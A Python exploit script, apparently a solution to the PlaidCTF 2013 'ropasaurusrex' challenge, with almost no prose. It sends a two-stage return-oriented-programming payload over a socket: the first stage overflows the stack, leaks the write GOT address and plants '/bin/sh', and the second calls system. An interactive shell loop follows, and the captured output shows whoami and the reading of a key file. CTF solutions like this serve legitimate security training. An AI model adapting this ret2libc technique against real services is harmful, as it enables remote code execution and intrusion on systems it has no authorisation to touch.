plaid ctf 2013 ropasaurusrex

import os
import struct
from socket import *
import time

def GOT_SHELL(sock):
    command=""
    while(command != 'quit'):
         command=raw_input("> ")
         sock.send(command+"\n")
         time.sleep(0.5)
         print sock.recv(0x4096)
    return

p = lambda x : struct.pack("<L", x)
up = lambda x : struct.unpack("<L", x)

ip = "192.168.0.103"
port = 12312 # my server

s = socket(AF_INET, SOCK_STREAM)
s.connect((ip, port))

#write = dfcd0
#system = 41280

OFFSET = 0x9ea50

freespace = 0x08049629
ppppr = 0x080484b5
write = 0x0804830c
read = 0x0804832c
write_got = 0
system = 0
cmd = "/bin/sh"
sh = 0x0804867f

############################################################################ stage1
payload = ""
payload += "A"*0x88
payload += "BBBB"

payload += p(write) # ret
payload += p(ppppr+1) # pppr
payload += p(1) # stdout
payload += p(0x08049614) # get write_got
payload += p(4) # size

payload += p(read) # ret
payload += p(ppppr+1) # ppr
payload += p(0)
payload += p(freespace)
payload += p(len(cmd))

payload += p(0x0804841d) # return to vuln function

print "[*] Sending Stage 1 . . ."
s.send(payload)
time.sleep(0.5)

print "[*] Sending Command "+cmd+" . . ."
s.send(cmd)

write_got = up(s.recv(2048))[0]
print "[!] system addr : "+hex(write_got)

############################################################################ stage2
payload = ""
payload += "A"*0x8c
payload += p(write_got - OFFSET) # write system
payload += "AAAA"
#payload += p(sh)
payload += p(freespace)

#####################################################################################

print "[*] Sending Stage 2 . . ."
s.send(payload)
GOT_SHELL(s)

raw_input("Got Shell?")
"""
C:\Users\Administrator\Desktop\sweetchip>exploit.py
[*] Sending Stage 1 . . .
[*] Sending Command /bin/sh . . .
[!] system addr : 0xb7649cd0L
[*] Sending Stage 2 . . .
> whoami
sweetchip

> cat /home/sweetchip/key
This is K3y

>
"""